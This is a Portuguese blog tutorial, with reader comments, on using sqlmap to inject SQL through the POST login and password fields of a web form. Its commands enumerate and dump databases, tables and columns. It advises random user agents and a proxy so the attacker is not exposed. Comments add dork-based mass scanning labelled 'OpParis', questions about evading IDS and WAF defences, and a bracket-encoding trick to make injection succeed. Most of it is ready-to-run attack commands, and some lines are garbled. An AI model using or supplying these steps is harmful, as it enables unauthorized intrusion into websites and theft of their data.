sqlmap de uma forma diferente
COMANDOS - SQLMAP Injetando via POST.
sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump
AN ALISANDO DADOS PARA O ATAQUE VIA POST
Vamos ao agora enviar via post.
Exemplo uma tela de login e senha!, como injetar com sqlmap ??
alvo:http://www.pagina.com.br/
<form action="val
<input type="text" name="login">
<input type="text" name="senha">
</form>
No caso para onde é enviado os posts "campos login e senha".
sqlmap.py --url http://www.pagina.com.br/ validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
#2* e #1* Indica que são campos posts e os mesmo devem ser injetados
User_agentEX:
Mozilla/ 5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/ 531.21.10 (KHTML, like Gecko) M obile/7B405
A cada requisição ele vai mudar seu user agent:
#2* e #1* Indica que são campos posts e os mesmo devem ser injetados
DEIXANDO SEU AGENT HTTP RANDÔMICO
Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agent http://en.wikipedia.org/wiki/Mozilla/
A cada requisição ele vai mudar seu user agent:
sqlmap.py --url http://www.pagina.com.br/ validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent
SETANDO PROXY
Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"
ex:
sqlmap.py --url http://www.pagina.com.br/ validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"
depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
MODELO 2 DE INJETAR SQL VIA POST
Agora vamos utilizar a segunda forma de injetar via post.Lendo um
arquivo de requisição post via sqlmap, com o comando "-r"Precisamos
criar arquivo com o nome fica sua escolha configurado devidamente.Ex:- POST http://www.pagina.com.br/
Host: www.pagina.com.br
Origin: http://www.pagina.com.br/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.54.16 (KHTML, like Gecko) Version/5.1.4 Safari/534.54.16
Content-Type: multipart/
Accept: text/html,application/
Referer: http://www.pagina.com.br/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ea4b4f69b0ed5e611b0d
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive
Content-Length: 468
------WebKitFormBoundaryOMD405
Content-Disposition: form-data; name="login#1*"
admin
------WebKitFormBoundaryMDad40
Content-Disposition: form-data; name="senha#1*"
1234
depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
../sqlmap.py -r post.txt --dbs --random-agent --proxy="SEU
PROXY:PORTA"
"Conhecimento livre & Com responsabilidade"
"Conhecimento livre & Com responsabilidade"
bom obrigado
ResponderExcluirEste comentário foi removido por um administrador do blog.
ResponderExcluirBem a forma que ele esta mostrando a cima eu fiz doro perfeito bem mais simples voce ter varios modelos para guardar em servidores pela internet.
ResponderExcluirPara ajudar também vou colocar um cod.
./sqlmap.py -u IP_ALVO --level=5 --regexp --string --text-only --alert --crawl=CRAWLDEPTH --random-agent --dbms=mysql
Obrigado pelo tutor TKS
nem sempre o servidor e mysql
Excluir./sqlmap.py -g --flush-session='OpParis.txt' --dbms=MYSQL TESTADO OK
ResponderExcluir./sqlmap.py -g --flush-session='OpParis.txt' --dbms=MYSQL TESTADO OK
ResponderExcluirsqlmap -r /root/Desktop/post.txt --dbs --random-agent
ResponderExcluirQuando não especificamos o caminho aonde deve ser feito a leitura, da erro maioria das vezes !
No decore do ataque sqlmap aparece um ids,ips waf firewall o que fazer sou novo no mundo hacker
ResponderExcluirQuando vamos ejetar as vezes o cara coloca o metodo em java ex: form[senha] assim o ataque não vai entrar no dbs, para entrar altere os valores[] para %5b %5d com isso o comando deve ser escrito assim form%5bsenha%5d pronto você vai estar dentro.
ResponderExcluir